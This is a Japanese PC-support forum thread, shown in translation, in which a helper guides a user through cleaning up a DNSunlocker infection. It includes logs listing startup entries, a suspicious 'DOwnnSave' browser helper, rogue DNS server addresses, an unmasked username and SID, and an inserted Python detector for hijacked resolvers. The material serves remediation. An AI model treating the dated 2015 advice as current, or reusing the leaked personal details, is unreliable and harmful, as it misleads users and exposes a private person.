Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 2015/06/22 17.3 MB 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 40.0.3 (x86 ja) Mozilla 2015/09/14 84.7 MB 40.0.3
Mozilla Maintenance Service Mozilla 2015/09/13 233 KB 40.0.3
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 0.96 GB 9.0.2.9006
Origin Electronic Arts, Inc. 2014/05/11 9.4.7.2799
PDF-Viewer Tracker Software Products Ltd 2015/09/26 23.5 MB 2.5.315.0
Portal 2 Valve 2015/01/29
PunkBuster Services Even Balance, Inc. 2015/02/04 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype Click to Call Microsoft Corporation 2015/09/26 10.2 MB 7.4.0.9058
Skype(TM) 7.10 Skype Technologies S.A. 2015/09/26 72.6 MB 7.10.101
Starbound 2015/01/29
Starbound - Unstable 2015/06/22
Steam Valve Corporation 2014/04/23
TeamSpeak 3 Client TeamSpeak Systems GmbH 2015/02/22 3.0.16
Terraria Re-Logic 2014/08/05
The Walking Dead 2015/01/29
The Walking Dead: Season Two Telltale Games 2015/01/29
Unity Web Player Unity Technologies ApS 2014/05/12 12.0 MB
VLC media player VideoLAN 2015/09/07 2.2.1
Welcome Center Acer Incorporated 2013/08/08 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 23.6 MB 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd. 2014/07/08
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0


cc windows---------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run Dropbox Update Dropbox, Inc. "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
無効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run Google Japanese Input Prelauncher Google Inc. "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run iTunesHelper Apple Inc. "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
有効 HKLM:Run Launch LCore Logitech Inc. C:\Program Files\Logicool Gaming Software\LCore.exe /minimized
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run Logitech Download Assistant Microsoft Corporation C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
無効 HKLM:Run LogMeIn Hamachi Ui LogMeIn Inc. "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
無効 HKLM:Run mcui_exe "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
無効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
無効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
有効 HKLM:Run SunJavaUpdateSched Oracle Corporation "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
有効 Startup User Dropbox.lnk Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe


cc ie------------------------------

有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Extension Skype Click to Call settings Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper DOwnnSave C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll
有効 Helper Java(tm) Plug-In 2 SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
有効 Helper Java(tm) Plug-In SSV Helper Oracle Corporation C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
有効 Helper Skype Click to Call for Internet Explorer Microsoft Corporation C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll


cc chrome--------------------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.30 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0
有効 App Google ドライブ 14.0 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0
有効 App YouTube 4.2.8 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0
有効 Extension Adblock Plus 1.9.3 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.3_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.80 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.5 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.5_0


cc firefox--------------------------------

有効 Extension Score Viewer for beatmania IIDX 22 PENDUAL 2.2 nob_m default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\rj7fujg6.default\extensions\ScoreViewerForIIDX22@nob_m.com.xpi
無効 Extension Skype Click to Call 7.4.0.9058 Microsoft Corporation default Firefox 40.0.3 C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
有効 Plugin Adobe Acrobat 10.1.15.11 Adobe Systems Inc. default Firefox 40.0.3 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
有効 Plugin Battlelog Game Launcher 2.4.0.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
有効 Plugin Battlelog Game Launcher 2.6.2.0 EA Digital Illusions CE AB default Firefox 40.0.3 C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll
有効 Plugin Google Update 1.3.28.15 Google Inc. default Firefox 40.0.3 C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
有効 Plugin Intel® Identity Protection Technology 2.0.59.0 Intel Corporation default Firefox 40.0.3 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
有効 Plugin iTunes Application Detector 1.0.1.1 Apple Inc. default Firefox 40.0.3 C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll
有効 Plugin Java Deployment Toolkit 8.0.600.27 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npdeployJava1.dll
有効 Plugin Java(TM) Platform SE 8 U60 11.60.2.27 Oracle Corporation default Firefox 40.0.3 C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll
有効 Plugin Nexon Game Controller 1.0.1.4 Nexon default Firefox 40.0.3 C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin OpenH264 Video Codec 1.4 default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\rj7fujg6.default\gmp-gmpopenh264\1.4\gmpopenh264.dll
有効 Plugin Primetime Content Decryption Module provided by Adobe Systems, Incorporated 13 Adobe Systems Inc default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\Roaming\Mozilla\Firefox\Profiles\rj7fujg6.default\gmp-eme-adobe\13\eme-adobe.dll
有効 Plugin Shockwave Flash 19.0.0.185 Adobe Systems Incorporated default Firefox 40.0.3 C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll
有効 Plugin Silverlight Plug-In 5.1.40416.0 Microsoft Corporation default Firefox 40.0.3 c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll
有効 Plugin Unity Player 4.3.7.33236 Unity Technologies ApS default Firefox 40.0.3 C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3538.513 Microsoft Corporation default Firefox 40.0.3 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll


cc Scheduled Tasks-----------------

有効 Task Adobe Acrobat Update Task Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar


cc Context Menu ------------------

有効 Directory 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 Directory DropboxExt Dropbox, Inc. C:\Users\kaito\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 Directory ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 Directory ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Directory VLCメディアプレイヤーで再生 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1"
有効 Directory VLCメディアプレイヤーのプレイリストに追加 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1"
有効 Directory 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 Drive ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Drive 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 File 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 File DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 File ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
有効 Folder ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
  • あすとろ
  • 2015/10/05 (Mon) 12:36:43
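Two things to update
Good evening.
So this is your report after the wait-and-see period.

>I waited and watched as instructed, and I think I can use the PC without problems, as before.

Glad to hear no abnormalities are showing up.
However, looking at the logs, I can see a few problems.
Let's fix these.

>MSIE: Internet Explorer v9.00 (9.00.8112.16659)

IE has not yet been updated to the latest version, IE11.
This alone means a high risk of a dangerous infection through an exploited vulnerability, so please download and install IE11 for Win7 64-bit.
http://blogs.technet.com/b/cs3_windows/archive/2014/07/14/502-windows-7-internet-explorer-11.aspx

The following also must be updated.
>Mozilla Firefox 40.0.3 (x86 ja) Mozilla 2015/09/14 84.7 MB 40.0.3

Once the two updates above are done, please take just the HJT log and the installed-programs log again and show them to me.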
  • 悪代官
  • 2015/10/05 (Mon) 19:34:46
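Re: DNSunlocker infection
Sorry for the delay. I was able to update Firefox, but IE cannot be updated, for the same reason that Windows Update failed the other day.

I searched and tried various things but could not resolve it, so I am replying with a status report.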
  • あすとろ
  • 2015/10/08 (Thu) 15:40:12
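A little work with HJT too
Good evening.
Sorry for being late again today.

>I was able to update Firefox, but IE cannot be updated, for the same reason that Windows Update failed the other day.

Right, do you mean that you cannot download the "Japanese, Win7 64-bit" version of IE from the download page below?
http://windows.microsoft.com/ja-jp/internet-explorer/ie-11-worldwide-languages

If that is not possible, it seems problems still remain.
Several are still visible in the logs you showed me earlier.

So please carry out the following checks and steps.

First, following the procedure on the page below, which you should already have looked at, check the proxy settings, and if you find any tampering, correct it.
http://note.chiebukuro.yahoo.co.jp/detail/n335704

If you find none, next start HJT in Safe Mode, run a scan, and then fix the entries below.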
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167

O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167

O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167

O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167

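After that, restart the PC in normal mode, then just run a scan with HJT again and save that log.

After the work, watch for a while, then reply with a report on whether the same abnormality continues, along with the retaken HJT log.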
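The check behind the O17 fix in the reply above, as an added example that is not part of the original thread: it parses HijackThis O17 `NameServer` lines, expands the CCS/CS1/CS2 shorthand, and lists statically configured resolvers that are neither private addresses nor on an allowlist. The function names, the `known_good` parameter and the all-zero-GUID line are assumptions made for illustration; the other sample lines are copied from this thread.

```python
import ipaddress
import re
from collections import defaultdict

# O17 lines copied from the thread: four reported before the fix, one after.
PAGE_LINES = r"""
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
"""
# Constructed line (not from the thread): a public resolver the owner chose.
CONSTRUCTED_LINE = (
    r"O17 - HKLM\System\CCS\Services\Tcpip\..\{00000000-0000-0000-0000-000000000000}"
    r": NameServer = 8.8.8.8"
)
SAMPLE_LOG = PAGE_LINES + CONSTRUCTED_LINE + "\n"

# Per-interface static DNS setting, in the form HijackThis prints it.
O17_RE = re.compile(
    r"^O17 - HKLM\\System\\(?P<cs>CCS|CS\d+)\\Services\\Tcpip\\\.\.\\"
    r"(?P<iface>\{[0-9A-Fa-f-]{36}\}): NameServer = (?P<servers>.*)$"
)


def expand_control_set(abbrev):
    """Expand the CCS/CS1/CS2 shorthand to the registry key name."""
    if abbrev == "CCS":
        return "CurrentControlSet"
    return "ControlSet%03d" % int(abbrev[2:])


def parse_o17(line):
    """Return (control_set, interface_guid, [servers]); None for other lines."""
    m = O17_RE.match(line.strip())
    if not m:
        return None
    servers = [s for s in re.split(r"[,\s]+", m.group("servers")) if s]
    return expand_control_set(m.group("cs")), m.group("iface").upper(), servers


def review_nameservers(log_text, known_good=()):
    """List static DNS servers that are neither private nor in known_good."""
    allowed = set(known_good)
    findings = []
    for line in log_text.splitlines():
        parsed = parse_o17(line)
        if parsed is None:
            continue
        control_set, iface, servers = parsed
        for server in servers:
            if server in allowed:
                continue
            try:
                addr = ipaddress.ip_address(server)
            except ValueError:
                findings.append((control_set, iface, server, "not an IP address"))
                continue
            # Private, loopback and link-local resolvers are what a home
            # router or a local stub normally hands out; anything else is a
            # value the owner should be able to explain.
            if not (addr.is_private or addr.is_loopback or addr.is_link_local):
                findings.append(
                    (control_set, iface, server, "public resolver not in known_good")
                )
    return findings


def affected_interfaces(findings):
    """Map each flagged interface GUID to the control sets that carry it."""
    by_iface = defaultdict(set)
    for control_set, iface, _server, _reason in findings:
        by_iface[iface].add(control_set)
    return {iface: sorted(sets) for iface, sets in by_iface.items()}


if __name__ == "__main__":
    flagged = review_nameservers(SAMPLE_LOG, known_good={"8.8.8.8"})
    for iface, sets in affected_interfaces(flagged).items():
        servers = sorted({f[2] for f in flagged if f[1] == iface})
        print(iface, "in", ", ".join(sets), "->", ", ".join(servers))
```

A flagged entry is a prompt to check that adapter's DNS settings, not proof of tampering; resolvers that were set on purpose belong in `known_good`.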
  • 悪代官
  • 2015/10/08 (Thu) 20:11:15
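Re: DNSunlocker infection
I am the one who should apologize for the late reply.

>Right, do you mean that you cannot download the "Japanese, Win7 64-bit" version of IE from the download page below?

My explanation was insufficient. The download itself works, but when I try to install, a popup appears saying "Go online and install the required programs, then return to the Internet Explorer installation page and run setup again," and I cannot install.

After deleting the specified entries, I applied the patch file that IVNO made for me earlier and tried Windows Update again, but nothing changed.

Now I will paste the HJT log.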


Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 1:13:27, on 2015/10/12
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 41.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\46.0.2490.13\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
